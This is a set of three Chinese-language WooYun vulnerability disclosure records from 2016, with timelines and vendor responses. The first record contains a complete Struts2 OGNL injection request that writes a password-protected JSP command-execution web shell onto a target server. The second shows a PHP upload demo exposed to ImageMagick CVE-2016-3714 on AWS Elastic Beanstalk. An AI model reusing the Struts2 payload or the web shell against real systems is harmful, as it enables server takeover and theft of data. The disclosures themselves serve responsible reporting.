漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：不多说了，赶快上车详细说明：这个系统之前就有漏洞 http://**.**.**.**/bugs/wooyun-2016-0170697据说很多敏感数据啊code 区域http://**.**.**.**:8091/logout.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%**.**.**.**.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%**.**.**.**.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E最新的st2命令执行漏洞证明：借tangscan的工具验证了一下也没问题 修复方案：升级版权声明：转载请注明来源 举起手来@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-29 18:33厂商回复：CNVD确认并复现所述情况，已经转由CNCERT发给中国银联，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-09： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述：Amazon AWS Elastic Beanstalk Remote Command Execution.RCE嘛，inbound rules也就形同虚设了。详细说明：https://aws.amazon.com/cn/elasticbeanstalk/亚马逊AWS Elastic Beanstalk可以让用户快速方便的搭建web环境，例如PHP环境，EBS将直接把常用的module部署上去，包括ImageMagick。也就是说只要选择好哪种语言的环境，直接自动化部署，不能自定义module，用户没的选择。直到现在亚马逊也没有给EBS用户推送CVE-2016-3714的补丁。这是刚刚搭建的环境： 漏洞证明：一个Demo：code 区域<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>upload</title> </head> <body> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="submit"> </form> </body> <?php $filename = $_FILES['file']['name']; $type = substr($filename, strrpos($filename, '.')+1); if ($type === "jpg" || $type === "png" || $type === "gif") { move_uploaded_file($_FILES['file']['tmp_name'], $filename); $imgObject = new Imagick($filename); } ?> </html>http://52.36.61.47/imagick.phphttp://52.36.61.47/wordpress/code 区域gougouxia meijj 修复方案：EBS的模式是挺不错，但是要第一时间"意识到"自动部署的模块存在漏洞，并推送补丁，因为用户没的选择。EBS ImageMagick Update to 7.0.1版权声明：转载请注明来源 从容@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-10 12:45厂商回复：已确认。目前Elastic Beanstalk服务提供给客户的默认PHP环境受此漏洞影响，我们将紧急推送补丁到客户的环境。最新状态：2016-05-10：Hello, Thank you for contacting Amazon. For future reference, you may pass these types of reports directly to us at 我爱乌云amazon.com. Thank you for sharing with us your concerns. Kind regards,2016-06-24：漏洞已修复

漏洞详情披露状态： 2016-04-24： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述： 详细说明：某第三方物流管理云平台漏洞可Getshell(泄露服务器数GB文件涉及运单/发货/收货人地址/联系信息).地址：http://**.**.**.**/goToLogin.action  漏洞证明：可Getshell(泄露服务器数GB文件涉及运单/发货/收货人地址/联系信息).        修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-04-27 11:08厂商回复：CNVD未直接复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。最新状态：暂无